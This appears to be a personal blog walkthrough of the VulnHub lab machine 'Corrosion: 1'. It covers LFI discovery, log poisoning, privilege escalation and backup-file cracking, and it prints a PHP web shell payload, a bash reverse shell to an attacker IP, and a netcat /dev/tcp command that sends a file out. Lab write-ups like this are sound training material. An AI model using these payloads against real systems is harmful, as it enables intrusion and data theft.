Persecure : my learning archive

, ,

Corrosion: 1

Download the machine:

https://www.vulnhub.com/entry/corrosion-1,730/

Overview

  • Enumeration will lead a blog-post folder, enumerate the folder again to find an archive folder
  • Use ffuf to find a URL paramaeter for a LFI vulnerablity
  • Log poisoning vulnerability is present
  • Inject a php backdoor into the logs
  • Attached a reverse shell into the php backdoor
  • Find for a user backup zip and transfer it to attacking machine
  • Crack the zip folder with john to gain some creds and other files
  • Once user access is gain via SSH check for sudo permissions
  • Write a binary and overwrite the main file to get root access

Enumeration

Run nmap scan to find for open ports.

Run a gobuster scan to find for hidden directories.

Web server

Found a potential user name.

/tasks

Couldn’t find any more cluse so I decided to enumerate the blog-post directory.

Found an archives folder. That contain a php log file.

Let’s see if we can fuzz the URL parameter to get an access for LFI. Use the ffuf tool.
Found a parameter.

Let’s test the payload.

It works.

Since the to-do list indicates to change the authentication of the log file , let’s see if we can access them.

Let’s test a log poisoning attack with a random username.

Since log poisoning is a possibility let’s inject it with a backdoor. You read more of it here.

Payload : '‘<?php system($_GET["cmd"]); ?>’'

SSH to the machine with the above payload.

Payload is injected.

Let’s enter id to test the payload.

we are able to use command injection.

Now inject a bash revershell. Make sure to URL encode the file and start a netcat listener.

bash -c ‘bash -i >& /dev/tcp/192.168.18.8/1234 0>&1’

Foothold

User access gained.

I upgraded the shell and tried to access the randy folder but we don’t have permissions. We don’t have sudo permissions either.

After some time enumerating the folders , I found a user backup zip file. I used netcat to transfer the file to my local machine.

On your local machine use this command to recive the file : nc -nlvp 4444 > user.zip

On the target machine use this to send the file : cat user_backup.zip > /dev/tcp/192.168.18.8/4444

Now that we have the file , it is password protected. So we need to break into it.

Use zip2john | tee hash and then john to crack the hash.

Unzip the file and we get the following.

Read the password and we are able to SSH into the randy user.

Check sudo permissions.

Found the first flag.

Privilege escalation

We head to the tools folder and found the easysysinfo tools.

However they are root protected and we aren’t able to edit the file.

I remember seeing a easysysinfo file in the zipped file but it is written in C instead of python.

Let’s replicate this file but add a bash shell inside the code.

Compile the file and set the output as the easysysinfo main file to overwrite it.

Root access will be gained.

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

Comments (

0

)

%d bloggers like this: